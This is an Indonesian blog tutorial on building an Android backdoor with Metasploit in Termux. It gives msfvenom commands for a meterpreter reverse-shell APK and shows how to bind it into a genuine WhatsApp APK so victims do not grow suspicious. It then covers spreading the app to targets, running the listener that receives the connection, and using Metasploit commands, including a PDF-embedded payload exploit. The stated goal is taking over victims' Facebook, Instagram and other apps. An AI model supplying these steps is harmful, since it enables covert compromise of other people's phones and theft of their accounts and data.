Menu Tutup

Cara Membuat Backdoor Menggunakan Metasploit di Termux

Halo gais, dalam artikel ini mas uzie akan menjelaskan tentang cara membuat backdoor menggunakan metasploit di termux.

Backdoor yang akan kita buat ini bisa di gunakan untuk hack akun facebook, hack instagram dan hack semua aplikasi yang terinstal di hp korbannya.

Apa itu Backdoor dan bagaimana cara membuat Bakdoor

Backdoor dalam bahasa indonesia berarti pintu belakang maksudnya adalah perangkat lunak yang digunakan untuk mengakses sistem, aplikasi, atau jaringan tanpa harus menangani proses autentikasi (lewat pintu belakang) kalau dalam dunia nyata bisa di gambarkan seperti maling.

Backdoor dapat membantu user yang membuat backdoor (peretas) dapat masuk ke dalam sistem tanpa harus melewati proses autentifikasi.

Backdoor juga dapat diartikan sebagai mekanisme yang digunakan untuk mengakses sistem atau jaringan.

Backdoor inilah yang akan kita gunakan untuk menyusup ke sebuah sistem.

Sebelum membuat backdoor, ada beberapa persyaratan yang harus kamu siapkan untuk membuat dackdoor.

Seperti judul di atas “cara membuat backdoor menggunakan metasploit di termux“, yah mas uzie akan membuat backdoor menggunakan metasploit di aplikasi termux.

Bahan yang akan kita gunakan untuk membuat sebuah backdoor:

  1. Hp Android
  2. Aplikasi Termux
  3. Instal MetasPloit
  4. Port For wading / IP / Local Host
  5. Kopi / teh / racun tikus juga boleh

Jika kamu ga punya hp Android kamu bisa gunakan pc atau laptop, jika ga punya juga, beli dulu oke…

Silahkan download termux dan instal aplikasi termux di hp Android kamu.

Jika sudah terinstal, masukan perintah berikut:

  • $ apt update && upgrade

Kamu sudah siap menggunaka aplikasi termux di hp Android kamu, bahan selanjutnya yaitu metasploit.

Kita akan membuat backdoor menggunakan metasploit, simak tutorial lengkapnya ya gais.

Cara Membuat Backdoor

Berikut ini adalah comand untuk membuat backdoor menggunakan metasploit di termux:

Instal Metasploit di Termux

  • $ apt install python
  • $ apt install python2
  • $ apt install git
  • $ apt install wget
  • $ apt install ruby
  • $ pkg install curl
  • $ git clone https://github.com/Hax4us/Metasploit_termux
  • $ cd metasploit-termux
  • $ ./metasploit.sh
  • $ msfvenom -p android/meterpreter/reverse_tcp lhost=Ip_Kamu lport=8080 -o /sdcard/maling.apk

Remot (Payload) msfvenom

  • msfconsole
  • use exploit/multi/handler
  • set payload android/meterpreter/reverse_tcp
  • set lhost Ip_Kamu
  • set lport 8080
  • run

Membuka alamat ip Android

  • $ ifconfig

Menyisipkan Backdoor ke Aplikasi Android Original

  • $ cd /sdcard
  • $ ls
  • $ cp Apk-original $HOME
  • $ msfvenom -x APK-original.apk -p android/meterpreter/reverse_tcp lhost=IP_kalian lport=4444 -o /sdcard/Nama_apkbackdoor.apk

Catatan: Tekan enter setelah memasukan perintah msfvenom di atas dan hilangkan tanda “$” di setiap comand atau perintah (karena sudah ada di termux secara default).

Jika masih bingung, berikut ini adalah tutorial lengkap cara membuat bacdoor lebih rincinya:

Instal dan Menggunakan Metasploit untuk Membuat Backdoor di Android

Untuk membuat backdoor dengan android di termux kita membutuhkan script metasploit, jadi instal metasploit di termux terlebih dahulu, masukan perintah berikut untuk menginstal metasploit:

  • $ apt install python
  • $ apt install python2
  • $ apt install git
  • $ apt install wget
  • $ apt install ruby
  • $ pkg install curl
  • $ git clone https://github.com/Hax4us/Metasploit_termux
  • $ cd metasploit-termux
  • $ ./metasploit.sh

Tunggu hingga proses instal metasploit selesai, mungkin agak lama, tergantung kecepatan koneksi internet kamu.

cara membuat backdoor

Metasploit sudah terinstal, kini saatnya untuk membuat backdoor.

Membuat Backdoor Menggunakan Metasploit Framrwork

Sebelum menjalankan metasploit, tahap pertama yaitu siapkan alamat IP kamu, untuk melihat alamat IP hp kamu, buka “New Sesion” di termux dan masukan perintah:

  • $ ifconfig

Maka akan tampil gambar seperti di bawah ini:

cara membuat backdoor
Alamat IP Anda adalah angka setelah “inet addr:” pada gambar ini, alamat ip kami adalah 10.249.35.119 dan setiap perangkat memiliki alamat IP yang berbeda

Contoh: IP hp saya itu “inet addr: 10.249.35.119” (Alamat IP setelah inet addr yaitu 10.249.35.119

BACA JUGA  Script Hack IG MBF Multi Brute Forcing Instagram

Untuk Port ya bebas, contoh 8080 atau 4444.

Sekaran saatnya untuk membuat backdoor

Jika sudah, langsung saja kita buat backdoornya menggunakan metasploit di aplikasi termux.

Berikut ini adalah perintah msfvenom untuk membuat backdoornya:

Membuat Aplikasi Backdoor

Masukan perintah berikut:

  • $ msfvenom -p android/meterpreter/reverse_tcp lhost=Ip_Kamu lport=….. -o /sdcard/……

Ganti “Ip_Kamu” dengan alamat ip hp Android kamu.

Untuk port nya bebas contoh di atas saya menggunakan port “8080

Untuk “bagian sdcard/…..” bisa kamu ganti juga, bebas. misal “maling.apk

Contoh:

  • $ msfvenom -p android/meterpreter/reverse_tcp lhost=10.249.35.119 lport=8080 -o /sdcard/maling.apk

Tunggu hingga proses pembuatan backdoor selesai, jika sudah, silahkan buka file manager (penyimpanan) di hp kamu.

cara membuat backdoor
Backdoor berhasil di buat, biasanya berukuran sekitar 10mb

Cari file yang kamu buat tadi, dalam contoh saya, saya membuat backdoor dengan nama maling.apk

cara membuat backdoor
Backdoor tersimpan di memori ponsel dengan nama seperti yang kamu buat

Atau bisa kamu cek lewat termux, buka New Sesion masukan perintah berikut:

  • $ cd /sdcard
  • $ ls

Aplikasi backdoor sudah berhasil kita buat, langkah selanjutnya yaitu menyebarkan aplikasi tersebut kepada calon korban.

Tapi bagaimana agar si korban tidak curiga, dalam kasus ini kita akan menyisipkan backdoor ke aplikasi original seperti facebook WhatApp atau aplikasi game lainnya.

Cara Menyisipkan Backdoor ke Aplikasi Original Android

Oke, di sini kita akan mencoba menggabungka aplikasi backdoor yang telah kita buat ke aplikasi WhatsApp dari play store.

Pertama kalian copy file apk original yang ingin disisipi backdoor ke

/data/data/com.termux/files/home/

Untuk cara mencopy nya kalian buka aplikasi termux, kemudian masuk ke tempat anda menyimpan apk originalnya, misalkan file nya ada di sdcard kita masuk dengen menggunakan perintah:

  • $ cd /sdcard
  • $ ls

Setelah itu kita copy apk originalnya ketikan perintah:

  • $ cp Apk-original $HOME

Contoh: Kita akan memindahkan WhatsApp ke termux:

  • $ cp WhatsApp $HOME

Setelah file APK sudah berada di Home termux, sekarang saatnya untuk meyisipkan backdoor ke aplikasi WhatsApp, facebook atau aplikasi lainnya.

Masukan perintah berikut:

  • $ msfvenom -x APK-original.apk -p android/meterpreter/reverse_tcp lhost=IP_kalian lport=4444 -o /sdcard/Nama_apkbackdoor.apk

Keterangan:

APK-original: Nama apk original kalian

Nama_apkbackdoor.apk: Nama aplikasi backdoor yang telah kamu buat tadi

IP_kalian: Ganti dengan IP kalian

Contoh:

  • $ msfvenom -x WhatsApp.apk -p android/meterpreter/reverse_tcp lhost=10.213.59.184 lport=4444 -o /sdcard/maling.apk

Backdoor sudah berhasil kamu sisipka ke aplikasi original, backdoor siap di sebarkan.

Catatan: Jangan tutup termux hingga korban menginstal aplikasi yang telah kalian sisipi backdoor tersebut.

Jika korban telah menginstal aplikasi backdoor yang kamu buat, sekarang tinggal mengakses backdoor.

Remot Backdoor Apk (Payload) msfvenom

Berikut ini adalah perintah yang di gunakan untuk remot backdoor yang telah kalian buat:

  • msfconsole
  • use exploit/multi/handler
  • set payload android/meterpreter/reverse_tcp
  • set lhost Ip_Kamu
  • set lport 8080
  • run

Perintah Dasar (Basic Comand) Metasploit

Berikut ini adalah beberapa perintah dasar atau basic comand metasploit:

banner

Perintah ini digunakan untuk memilih secara acak logo metasploit yang akan di tampilkan

msf > banner

MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMM                MMMMMMMMMM
MMMN$                           vMMMM
MMMNl  MMMMM             MMMMM  JMMMM
MMMNl  MMMMMMMN       NMMMMMMM  JMMMM
MMMNl  MMMMMMMMMNmmmNMMMMMMMMM  JMMMM
MMMNI  MMMMMMMMMMMMMMMMMMMMMMM  jMMMM
MMMNI  MMMMMMMMMMMMMMMMMMMMMMM  jMMMM
MMMNI  MMMMM   MMMMMMM   MMMMM  jMMMM
MMMNI  MMMMM   MMMMMMM   MMMMM  jMMMM
MMMNI  MMMNM   MMMMMMM   MMMMM  jMMMM
MMMNI  WMMMM   MMMMMMM   MMMM#  JMMMM
MMMMR  ?MMNM             MMMMM .dMMMM
MMMMNm `?MMM             MMMM` dMMMMM
MMMMMMN  ?MM             MM?  NMMMMMN
MMMMMMMMNe                 JMMMMMNMMM
MMMMMMMMMMNm,            eMMMMMNMMNMM
MMMMNNMNMMMMMNx        MMMMMMNMMNMMNM
MMMMMMMMNMMNMMMMm+..+MMNMMNMNMMNMMNMM
        http://metasploit.pro


Tired of typing 'set RHOSTS'? Click & pwn with Metasploit Pro
Learn more on http://rapid7.com/metasploit

       =[ metasploit v4.11.4-2015071403                   ]
+ -- --=[ 1467 exploits - 840 auxiliary - 232 post        ]
+ -- --=[ 432 payloads - 37 encoders - 8 nops             ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

msf >

db_status

Perintah ini digunakan untuk mengecek koneksi database postgresql

msf > db_status
[*] postgresql connected to msf
msf >

show exploit

Perintah ini digunakan untuk melihat semua exploit yang ada di metasploit

msf > show exploits

Exploits
========

   Name                                                           Disclosure Date  Rank       Description
   ----                                                           ---------------  ----       -----------
   aix/local/ibstat_path                                          2013-09-24       excellent  ibstat $PATH Privilege Escalation
   aix/rpc_cmsd_opcode21                                          2009-10-07       great      AIX Calendar Manager Service Daemon (rpc.cmsd) Opcode 21 Buffer Overflow
   aix/rpc_ttdbserverd_realpath                                   2009-06-17       great      ToolTalk rpc.ttdbserverd _tt_internal_realpath Buffer Overflow (AIX)

show payloads

Perintah ini digunakan untuk melihat semua payload yang ada
msf > show payloads

Payloads
========

   Name                                                Disclosure Date  Rank    Description
   ----                                                ---------------  ----    -----------
   aix/ppc/shell_bind_tcp                                               normal  AIX Command Shell, Bind TCP Inline
   aix/ppc/shell_find_port                                              normal  AIX Command Shell, Find Port Inline
   aix/ppc/shell_interact                                               normal  AIX execve Shell for inetd
   aix/ppc/shell_reverse_tcp                                            normal  AIX Command Shell, Reverse TCP Inline

show auxiliary

Perintah ini digunakan untuk menampilkan semua module auxiliary

BACA JUGA  Instal Yuotube di Termux dari GitHub
msf > show auxiliary

Auxiliary
=========

   Name                                                           Disclosure Date  Rank    Description
   ----                                                           ---------------  ----    -----------
   admin/2wire/xslt_password_reset                                2007-08-15       normal  2Wire Cross-Site Request Forgery Password Reset Vulnerability
   admin/android/google_play_store_uxss_xframe_rce                                 normal  Android Browser RCE Through Google Play Store XFO
   admin/appletv/appletv_display_image                                             normal  Apple TV Image Remote Control
   admin/appletv/appletv_display_video                                             normal  Apple TV Video Remote Control

search name

Perintah ini digunakan untuk mencari sebuah exploit atau module yang disebutkan
msf > search pdf_embedded

Matching Modules
================

   Name                                                    Disclosure Date  Rank       Description
   ----                                                    ---------------  ----       -----------
   exploit/windows/fileformat/adobe_pdf_embedded_exe       2010-03-29       excellent  Adobe PDF Embedded EXE Social Engineering
   exploit/windows/fileformat/adobe_pdf_embedded_exe_nojs  2010-03-29       excellent  Adobe PDF Escape EXE Social Engineering (No JavaScript)


msf > 

use

Perintah ini digunakan untuk menentukan module exploit yang akan digunakan
msf > use exploit/windows/fileformat/adobe_pdf_embedded_exe
msf exploit(adobe_pdf_embedded_exe) > 

set payload

Perintah ini untuk menentukan payload yang akan digunakan
msf > use exploit/windows/fileformat/adobe_pdf_embedded_exe
msf exploit(adobe_pdf_embedded_exe) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(adobe_pdf_embedded_exe) > 

show targets

Perintah ini digunakan untuk melihat platform target yang dapat diserang dengan exploit yang digunakan
msf exploit(adobe_pdf_embedded_exe) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Adobe Reader v8.x, v9.x / Windows XP SP3 (English/Spanish) / Windows Vista/7 (English)


msf exploit(adobe_pdf_embedded_exe) >

show options

Perintah ini digunakan melihat pilihan yang tersedia untuk module atau exploit
msf exploit(adobe_pdf_embedded_exe_nojs) > show options

Module options (exploit/windows/fileformat/adobe_pdf_embedded_exe_nojs):

   Name            Current Setting                                                                                     Required  Description
   ----            ---------------                                                                                     --------  -----------
   EXENAME         msf.exe                                                                                             no        The Name of payload exe.
   FILENAME        evil.pdf                                                                                            no        The output filename.
   LAUNCH_MESSAGE  To view the encrypted content please tick the "Do not show this message again" box and press Open.  no        The message to display in the File: area


Exploit target:

   Id  Name
   --  ----
   0   Adobe Reader <= v9.3.3 (Windows XP SP3 English)


msf exploit(adobe_pdf_embedded_exe_nojs) > 

back

Perintah ini digunakan untuk kembali dari konteks saat ini
msf exploit(adobe_pdf_embedded_exe) > back
msf > 

set LHOST

Perintah ini digunakan untuk mengatur IP Attacker, bisa menggunakan IP Lokal atau IP Publik (tergantung kondisi )

msf exploit(adobe_pdf_embedded_exe) > set LHOST 192.168.1.100
lhost => 192.168.1.100
msf exploit(adobe_pdf_embedded_exe) >

set LPORT

Perintah ini digunakan untuk mengatur port lintener

msf exploit(adobe_pdf_embedded_exe) > set LPORT 443
LPORT => 443
msf exploit(adobe_pdf_embedded_exe) >

set RHOST

Perintah ini digunakan untuk menentukan IP Target, (biasa digunakan untuk jenis exploit tertentu)

msf auxiliary(ms12_020_maxchannelids) > set RHOST 192.168.1.103
RHOST => 192.168.1.103

unset

Kebalikan dari set perintah ini digunakan untuk membatalkan atau menghapus parameter yang sebelumnya di atur, kita juga dapat menghapus semua variabel dengan perintah ‘unset all’

msf exploit(handler) > unset payload android/meterpreter/reverse_tcp
Unsetting payload...
Unsetting android/meterpreter/reverse_tcp...
msf exploit(handler) > unset all
Flushing datastore...
msf exploit(handler) > 

save

Kita juga dapat menyimpan semua setting yang telah di tetapkan,dan semua akan dimuat ketika startup(saat msfconsole di buka) tanpa mengetur semuanya lagi dari awal.

msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.1.100
lhost => 192.168.1.100
msf exploit(handler) > set lport 443
lport => 443
msf exploit(handler) > save
Saved configuration to: /root/.msf4/config
msf exploit(handler) >

exploit

Perintah ini digunakan mengeksekusi module exploit dan menyerang target

msf exploit(handler) > exploit

[*] Started reverse handler on 192.168.1.100:443 
[*] Starting the payload handler...

exploit -j

Perintah ini digunakan mengeksekusi module exploit dan menyerang target sekaligus bejalan sebagai background

msf exploit(handler) > exploit -j
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.1.100:443 
[*] Starting the payload handler...
msf exploit(handler) >

exploit -z

Hampir sama dengan exploit -j,ini tidak berinteraksi dengan sesi meterpreter ketika exploitasi suskses(otomatis bejalan sebagai background jika exploitasi sukses)
msf exploit(handler) > exploit -z

[*] Started reverse handler on 192.168.1.100:443 
[*] Starting the payload handler...
[*] Sending stage (885806 bytes) to 192.168.1.103
[*] Meterpreter session 2 opened (192.168.1.100:443 -> 192.168.1.103:49272) at 2016-03-02 00:26:39 +0700
[*] Session 1 created in the background.
msf exploit(handler) >

sessions -l

Perintah ini digunakan untuk melihat list sesi meterpreter yang sedang aktif (berjalan sebagai background)

msf exploit(handler) > sessions -l

Active sessions
===============

  Id  Type                   Information                   Connection
  --  ----                   -----------                   ----------
  2   meterpreter x86/win32  SAMSUNG\SAMSUNG @ SAMSUNG  192.168.1.100:443 -> 192.168.1.103:49207 (192.168.1.103)

msf exploit(handler) > 

sessions -i ID

Perintah ini digunakan untuk berinteraksi kembali dengan sesi meterpreter yang sedang berjalan sebagai background

msf exploit(handler) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > 

sessions -K

Perintah ini digunakan untuk mematikan semua sesi meterpreter yang sedang aktif

msf exploit(handler) > sessions -K
[*] Killing all sessions...
[*] 192.168.1.103 - Meterpreter session 2 closed.
msf exploit(handler) > 

help

Perintah ini digunakan untuk melihat perintah-perintah dan deskripsi yang dapat digunakan pada msfconsole
msf > help

Core Commands
=============

    Command       Description
    -------       -----------
    ?             Help menu
    back          Move back from the current context
    banner        Display an awesome metasploit banner
    cd            Change the current working directory
    color         Toggle color
    connect       Communicate with a host
    edit          Edit the current module with $VISUAL or $EDITOR
    exit          Exit the console
    get           Gets the value of a context-specific variable
    getg          Gets the value of a global variable
    go_pro        Launch Metasploit web GUI
    grep          Grep the output of another command
    help          Help menu
Itulah beberapa contoh Perintah – Perintah dasar dari msfconsole, mohon maaf apabila ada bebrapa perintah yang masih kurang.
Artikel ini adalah rangkuman dari beberapa artikel yang telah di terbitkan di beberapa blog di bawah ini:
>> https://anher323.blogspot.com/…
>> https://asecc-eror404.blogspot.com/…
>> https://www.senitopeng.xyz/…
Sebelum kami rangkum, kami telah mencoba cara membuat backdoor ini dan berhasil, sekarang giliran kamu untuk mencoba membuat backdoor & selamat mencoba!

Tinggalkan Balasan